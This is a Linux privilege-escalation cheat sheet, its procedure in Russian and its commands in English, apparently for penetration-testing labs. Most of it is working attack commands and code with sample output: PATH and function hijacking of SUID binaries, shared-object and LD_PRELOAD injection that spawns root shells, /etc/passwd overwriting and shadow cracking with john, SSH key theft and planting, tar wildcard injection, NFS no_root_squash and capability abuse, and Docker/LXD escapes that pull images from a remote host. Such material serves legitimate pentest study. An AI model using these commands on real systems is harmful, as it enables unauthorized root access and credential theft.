PrivEsc: Linux
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Зафиксируйте текущие привилегии и политику целевой системы.
- Выберите вектор из раздела с учётом риска для стабильности ОС.
- После проверки откатите изменения, если это предусмотрено соглашением.
- Команды — справочно, на английском.
Методика
SUIDs Files
find / -perm -u=s -type f -exec ls -la {} + 2>/dev/null
find / -perm /4000 2>/dev/null
Absolute path
user@pwnbox:~$ strings /usr/local/bin/LaunchApache
[...]
/usr/sbin/service apache2 start
user@pwnbox:~$ function /usr/sbin/service() { /bin/bash -p; }
user@pwnbox:~$ export -f /usr/sbin/service
user@pwnbox:~$ /usr/local/bin/LaunchApache
root@debian:~# id
Relative path
user@pwnbox:~$ ls -la script
-rwsr-xr-x 1 root root 1003 Jun 4 2021 script
user@pwnbox:~$ ltrace ./script
setuid(0)= -1
setgid(0)= -1
system("ls")
user@pwnbox:~$ echo -e '#!/bin/bash\nbash -p' > /tmp/ls
user@pwnbox:~$ chmod +x /tmp/ls
user@pwnbox:~$ PATH=/tmp:$PATH
user@pwnbox:~$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
user@machine:~$ ./script
root@machine:~#
Shared Object Injection
user@pwnbox:~$ find / -type f -perm -04000 -ls 2>/dev/null
816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid
user@pwnbox:~$ strace /usr/local/bin/suid 2>&1 | grep -i -E "open|access|no such file"
[...]
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
user@pwnbox:~$ cat libcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
setuid(0);
system("/bin/bash -p");
}
user@pwnbox:~$ mkdir /home/user/.config
user@pwnbox:~$ gcc -shared -o /home/user/.config/libcalc.so -fPIC ./libcalc.c
TCM@debian:~$ /usr/local/bin/suid
Calculating something, please wait...
bash-4.1# id
uid=0(root) gid=1000(user) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
SUDO
user@pwnbox:~$ cat /etc/sudoers
user@pwnbox:~$ sudo -s # Execute a shell as root
user@pwnbox:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: /usr/bin/vim
LD_PRELOAD
user@pwnbox:~$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD
User user may run the following commands on this host:
(root) NOPASSWD: /usr/bin/vim
user@pwnbox:~$ cat pre.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
user@pwnbox:~$ gcc -fPIC -shared -o pre.so pre.c -nostartfiles
user@pwnbox:~$ sudo LD_PRELOAD=pre.so vim
/etc/passwd
-rw-rw-r-- 1 root user 2694 Mar 6 2020 /etc/passwd
openssl passwd -1 -salt [salt] [password]
[...]
root:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
/etc/shadow
Read permissions
unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
john unshadowed.txt -w=<WORDLIST>
SSH Keys
authorized_keys
find / -name authorized_keys 2> /dev/null
curl http://<IP>/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys
id_rsa
find / -name id_rsa 2> /dev/null
grep -iRl "private key" / 2>/dev/null
chmod 400 id_rsa
ssh -i id_rsa user@<IP>
Crontabs
user@pwnbox:~$ cat /etc/crontab
# m h dom mon dow user command
*/5 * * * * root /home/user/script.sh
Capabilities
# List user capabilities
user@pwnbox:~$ capsh --print
# Find files with capabilities
user@pwnbox:~$ getcap -r / 2>/dev/null
/usr/bin/python2.6 = cap_setuid+ep
/usr/bin/perl5.26.1 = cap_setuid+ep
user@pwnbox:~$ /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
user@pwnbox:~$ /usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Wildcards
user@pwnbox:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
user@pwnbox:~$ echo "cp /bin/bash /tmp && chmod +s /tmp/bash" > shell.sh
user@pwnbox:~$ echo "" > --checkpoint=1
user@pwnbox:~$ echo "" > "--checkpoint-action=exec=sh shell.sh"
NFS (no_root_squash)
cappucino@polonfs:~$ cat /etc/exports
[...]
/home *(rw,no_root_squash)
kali@kali:~$ sudo mount -t nfs 10.10.181.37:home /tmp/mount -nolock
cappucino@polonfs:~$ cp /bin/bash .
kali@kali:/tmp/mount/cappucino$ sudo chown root bash
kali@kali:/tmp/mount/cappucino$ sudo chmod +s bash
cappucino@polonfs:~$ ls -la
-rwsr-sr-x 1 root cappucino 1113504 Jul 15 13:07 bash
cappucino@polonfs:~$ ./bash -p
bash-4.4# id
uid=1000(cappucino) gid=1000(cappucino) euid=0(root)
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > x.c
gcc -static x.c -o x
sudo chown root x
sudo chmod u+s x
-bash-4.2$ ./x
bash-4.2# id
uid=0(root) gid=0(root) groups=0(root)
Containers
Docker
docker images
docker run -v /:/mnt --rm -it <image> chroot /mnt sh
Lxd
# Attacker
cd /tmp/
git clone https://github.com/saghul/lxd-alpine-builder.git; cd lxd-alpine-builder/
sudo ./build-alpine
python -m SimpleHTTPServer 80
# Victim
wget <IP>/alpine.tar.gz
lxc image import ./alpine.tar.gz --alias myalpine
lxc image list #List images
lxc init myalpine ignite -c security.privileged=true
lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
Kernel Exploits
uname -a